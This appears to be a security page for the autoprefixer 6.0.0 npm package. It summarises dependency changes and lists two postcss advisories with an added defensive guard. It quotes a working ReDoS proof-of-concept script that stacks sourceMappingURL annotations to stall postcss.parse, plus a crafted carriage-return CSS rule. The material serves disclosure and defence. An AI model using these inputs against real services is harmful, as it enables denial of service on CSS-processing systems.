Autoprefixer 6.0.0 is a significant update from 5.2.0, with changes that improve both its functionality and the developer experience. The core dependency, postcss, moves from ~4.1.11 to ^5.0.4, a major version bump that indicates substantial changes in the underlying CSS parsing and manipulation layer. The direct dependency on autoprefixer-core is removed, replaced by this PostCSS update, which points to a deeper integration with PostCSS's core features. A new dependency, caniuse-db, is introduced, so the plugin can draw on more current browser compatibility data directly and prefix more accurately. The added browserslist dependency allows specifying which browsers to support.
The update also refactors its development dependencies, dropping babel-core and gulp-babel, which the older version required for ES6 transpilation. With the core library dependency gone, the package becomes a more straightforward extension of the PostCSS ecosystem, using num2fraction. The build tooling also requires newer compiler versions for development. The release dates are roughly three months apart, reflecting active development and a continuous push for new features and better performance. Developers upgrading should be aware of the PostCSS version jump and of possible compatibility issues with existing PostCSS plugins, while the updated browser compatibility data promises more precise, up-to-date prefix generation.
All vulnerabilities affecting version 6.0.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
// Proof of concept from the advisory: each iteration stacks more
// "/*# sourceMappingURL=" annotations (never closed) in front of a "!"
// and measures how long postcss.parse() takes on the result.
var postcss = require("postcss")

function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed stylesheet with a single annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      // A parse error still reports the elapsed time.
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
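As an added example, not code from either advisory or from the PostCSS project, the following Node.js guard applies two pre-parse checks to CSS from untrusted sources, one for each issue above: it counts "/*# sourceMappingURL=" annotations, since the ReDoS input is built by stacking thousands of them while an authored stylesheet carries at most one, and it normalises carriage returns to "\n" so a lone "\r" cannot be read one way by PostCSS and another way by whatever consumes its output. The function names, the limits and the sample inputs are assumptions chosen for illustration; the guard is a layer in front of the parser, and upgrading postcss remains the actual fix.

```javascript
// Added example, not part of the advisories or of PostCSS itself: a guard that
// runs before untrusted CSS reaches a parser. Names and limits are assumptions.

// Matches the source-map annotation that the ReDoS input is built from.
const SOURCEMAP_ANNOTATION = /\/\*\s*# sourceMappingURL=/g;

// An authored stylesheet carries at most one annotation, at its end; thousands
// of them is the shape of the pathological input.
function countSourceMapAnnotations(css) {
  const matches = css.match(SOURCEMAP_ANNOTATION);
  return matches ? matches.length : 0;
}

// Rewrite CRLF and lone CR to LF, so a "\r" cannot be treated as a line break
// by one component and as ordinary content by another.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Returns { ok: true, css, hadCarriageReturns } with the normalised text, or
// { ok: false, reason } when the input looks crafted rather than authored.
function guardUntrustedCss(css, opts = {}) {
  const maxBytes = opts.maxBytes === undefined ? 1024 * 1024 : opts.maxBytes;
  const maxAnnotations = opts.maxAnnotations === undefined ? 1 : opts.maxAnnotations;

  if (css.length > maxBytes) {
    return { ok: false, reason: 'stylesheet exceeds ' + maxBytes + ' bytes' };
  }
  const annotations = countSourceMapAnnotations(css);
  if (annotations > maxAnnotations) {
    return {
      ok: false,
      reason: annotations + ' sourceMappingURL annotations (max ' + maxAnnotations + ')'
    };
  }
  const normalized = normalizeLineEndings(css);
  return { ok: true, css: normalized, hadCarriageReturns: normalized !== css };
}

// Constructed sample inputs (assumptions for the demonstration).
const SAMPLE_NORMAL = 'a{}/*# sourceMappingURL=a.css.map */';
// Same shape as the ReDoS input, kept tiny: stacked, unterminated annotations.
const SAMPLE_STACKED = 'a{}' + '/*# sourceMappingURL='.repeat(5) + '!';
// The rule quoted by the line-return advisory, with a lone carriage return.
const SAMPLE_CR = '@font-face{ font:(\r/*);}';

const samples = [['normal', SAMPLE_NORMAL], ['stacked', SAMPLE_STACKED], ['cr', SAMPLE_CR]];
for (const [name, css] of samples) {
  console.log(name + ': ' + JSON.stringify(guardUntrustedCss(css)));
}
```

The annotation limit defaults to one because that is what build tooling emits; raise it through opts.maxAnnotations if a pipeline concatenates several mapped files. The guard reports hadCarriageReturns rather than silently dropping the input, so a caller that prefers to reject CR-bearing stylesheets outright can do so from the same result.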